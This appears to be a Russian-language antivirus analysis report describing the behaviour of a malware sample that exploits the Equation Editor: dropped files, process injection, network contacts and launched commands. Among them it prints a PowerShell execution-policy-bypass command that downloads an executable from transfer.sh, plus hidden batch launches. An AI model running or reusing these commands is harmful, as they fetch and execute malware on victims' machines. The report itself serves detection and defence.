Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%APPDATA%\binex.exe'
Внедряет код в
следующие пользовательские процессы:
- ffnqv.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\binex.exe
- %TEMP%\lqef33jtaznnb
- %TEMP%\gouymp
- %TEMP%\ffnqv.exe
- %TEMP%\e0cd.tmp\e0dd.tmp\e0fd.bat
Удаляет следующие файлы
- %TEMP%\e0cd.tmp\e0dd.tmp\e0fd.bat
Сетевая активность
Подключается к
- 'sa#####edesrectora.cl':80
TCP
Запросы HTTP GET
- http://sa#####edesrectora.cl/wp-content/plugins/ywjnmetzpw/grace.jpg
UDP
- DNS ASK sa#####edesrectora.cl
Другое
Создает и запускает на исполнение
- '%TEMP%\ffnqv.exe' %TEMP%\gouymp
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\E0CD.tmp\E0DD.tmp\E0FD.bat %TEMP%\ffnqv.exe %TEMP%\gouymp"' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\E0CD.tmp\E0DD.tmp\E0FD.bat %TEMP%\ffnqv.exe %TEMP%\gouymp"
- '<SYSTEM32>\attrib.exe' +h shams
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass "Invoke-WebRequest -OutFile kmshost.exe -Uri https://transfer.sh/lR2gnE/kmshost.exe"
